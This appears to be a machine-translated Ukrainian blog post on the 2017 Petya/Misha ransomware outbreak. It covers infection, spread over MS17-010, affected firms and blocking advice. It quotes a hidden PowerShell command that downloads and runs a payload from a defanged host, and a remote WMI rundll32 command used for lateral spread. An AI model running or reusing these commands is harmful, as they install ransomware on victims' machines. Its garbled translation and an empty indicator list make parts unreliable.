Шкідливий «петя» і «миша» що відбувається і що робити
Рекомендовані статті
В даний час інформаційна безпека є цілком самостійне потужне напрямок корпоративної автоматизації. Природно, що в таких умовах напрямок це все тісніше пов'язується з питаннями прикладної інформаційної ...
На сьогоднішній день забезпечення безпеки корпоративних ресурсів є однією з найбільш пріоритетних цілей для будь-якої компанії незалежно від масштабів і сфери діяльності. Ринок інформаційної безпеки розвивається, а це значить, що і ...
Туристичний бізнес, за рахунок розвитку якого якість життя населення має підвищуватися, добре вписується в концепцію «розумного міста». До того ж рівень використання інформаційних технологій в даній галузі за останні п'ятнадцять-двадцять років ...
Приводом для написання цього блогу стала вже друга протягом року масова вірусна епідемія. І це стало дуже неприємним прецедентом. Адже таких масштабних заражень не було вже дуже давно. Втім, дана ситуація була очікуваною. Епідемію викликали ...
В Інтернеті нова епідемія - новособранние віруси-шифрувальники «Петя» (Petya) і «Міша» (Misha), що поширилися вже по десяткам великих компаній по всьому світу.
А ось модель шифрування істотно змінилася. «Петя», проникаючи на комп'ютер з використанням експлойта, заражає MBR (головний завантажувальний запис) системи. А далі в систему завантажується «Міша», який шифрує файли на диску, і вимагає викуп у розмірі $ 300 за один комп'ютер. Так само є модифікації, коли «Петя» і «Міша» працюють незалежно один від одного, в залежності від наявності привілеїв адміністратора системи. Є повідомлення про те, то зустрічалася також модель поширення, яка використовує шкідливі вкладення з маскуванням під pdf-файли.
Цей шкідливий дует вже відправив в нокаут безліч сайтів СНД і зупинив роботу безлічі компаній. За повідомленнями ЗМІ вУкаіни з найбільшими проблемами зіткнулися в корпорації «Роснефть», в даний момент відключені основні сайти корпорації і сайт «Башнефть». Однак однозначної інформації про те, що це саме «Петя» і «Міша», поки немає. Шифрувальник ще не вивчений. За словами представників антивірусної компанії «Dr. Web », шифрувальник використовує іншу модель поширення. Однак візуально вікно вимагача ідентично з «Петром» і «Мішею».
Масові зараження зафіксовані у Франції, Іспанії, Укаїни, країнах СНД. В Україні від вірусу постраждали десятки державних і комерційних організацій.
Далі файл myguy. xls запускається за допомогою% WINDIR% \ System32 \ mshta. exe "« C: \ myguy. xls. hta »і викликає виконання powershell-скрита, що завантажує тіло шкідливий:
powershell. exe -WindowStyle Hidden (New-Object System. Net. WebClient) .DownloadFile ( 'h11p: // french-cooking. com / myguy. exe', '% APPDATA% \ 10807.exe'); "(PID: [ідентифікатор процесу], Additional Context: (System. Net. WebClient) .DownloadFile ( 'h11p: // french-cooking. com / myguy. exe', '% APPDATA% \ [випадкове число] .exe');)
Потім шкідливий намагається підключитися до серверів 111.90.139.247:80 і COFFEINOFFICE. XYZ: 80, які можливо є серверам управління.
Індикаторами компрометації є наявність файлів:
Після закріплення на хості відбувається сканування інших Windows машин в мережі і розповсюдження за рахунок вразливостей, описаних в MS17-010 (ті ж, що використовував WannaCry) по портам tcp: 135, tcp: 139, tcp: 445, tcp: 1024-1035.
Поширення також можна відбуватися за рахунок виконання команди:
Remote WMI, "process call create" C: \\ Windows \\ System32 \\ rundll32.exe "C: \\ Windows \\ perfc. Dat" # 1 "
Як уникнути зараження? 1) Заборонити доступ по http до серверів: french-cooking. com: 80 84.200.16.242:80 111.90.139.247:80 COFFEINOFFICE. XYZ: 80
2) Заборонити поштові вкладення і скачування файлів з іменами: Петя. apx, myguy. exe, myguy. xls, Order- [будь-яка дата] .doc
4) Налаштувати IPS на блокування експлойтів для MS17-010
5) Для захисту ще не заражених вузлів можна створити файл c: \ windows \ perfc без розширення. Зараження таких вузлів не відбувається.